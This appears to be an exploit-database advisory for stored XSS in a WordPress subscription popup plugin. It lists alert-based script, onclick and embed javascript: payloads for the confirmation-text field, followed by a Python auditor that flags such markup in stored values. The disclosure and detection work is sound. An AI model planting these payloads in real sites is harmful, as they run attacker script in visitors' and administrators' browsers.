## https://sploitus.com/exploit?id=WPEX-ID:68AF14EF-CA66-40D6-A1E5-09F74E2CD971
Create/edit a subscription, enable the GDPR options in it and add the following payload in the "confirmation text" setting:

v < 4.1.10 - <script>alert(/XSS/)</script>
v <= 4.1.10:
  <input class='js-subs-submit-btn' onclick='javascript:alert(/XSS/)' type='submit' value='Subscribe' style='width:300px;height:40px;background-color:#007fe1 !important;color:#FFFFFF;border-radius:4px !important;border-width:0px !important;border-color:#007fe1 !important;text-transform:none !important;border-style:solid'/>

  <embed src='javascript:alert(/XSS/)'> (<- will only work in the backend, when updating the Popup and the confirmation text has changed)

The XSS will be triggered when viewing/previewing the subscription popup (and clicking on the Subscribe button for version >= 4.1.10)
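
A defender-side check for the constructs above, as an added example that is not part of the original advisory or the plugin's code: it parses a stored confirmation-text value and reports script elements, inline event-handler attributes and javascript: URLs. The class and function names are hypothetical, and the sample strings are constructed from the payloads listed here with the style attribute shortened.

```python
from html.parser import HTMLParser

# Attributes whose value is a URL and can therefore carry a javascript: scheme.
URL_ATTRS = {"src", "href", "action", "formaction", "data"}


class ConfirmationTextAuditor(HTMLParser):
    """Hypothetical helper: records active content found in one HTML field."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag/attribute names and decodes entities in
        # attribute values; self-closing tags are routed here as well.
        if tag == "script":
            self.findings.append(("script-element", tag))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", f"{tag}[{name}]"))
            # Drop whitespace before the scheme check (URL parsers ignore
            # leading spaces and embedded tabs/newlines); may over-flag.
            compact = "".join((value or "").split()).lower()
            if name in URL_ATTRS and compact.startswith("javascript:"):
                self.findings.append(("javascript-url", f"{tag}[{name}]"))


def audit(html_text):
    """Return a list of (kind, location) findings for a stored HTML value."""
    parser = ConfirmationTextAuditor()
    parser.feed(html_text)
    parser.close()
    return parser.findings


# Constructed samples: the three constructs from the page plus a benign value.
SAMPLES = {
    "script": "<script>alert(/XSS/)</script>",
    "onclick": "<input class='js-subs-submit-btn' onclick='javascript:alert(/XSS/)'"
               " type='submit' value='Subscribe' style='width:300px'/>",
    "embed": "<embed src='javascript:alert(/XSS/)'>",
    "benign": "<p>Thank you for subscribing.</p>",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(label, audit(text))
```

Any finding on a confirmation-text value exported from the site's database means that field holds markup that would execute when the popup is viewed or its button is clicked.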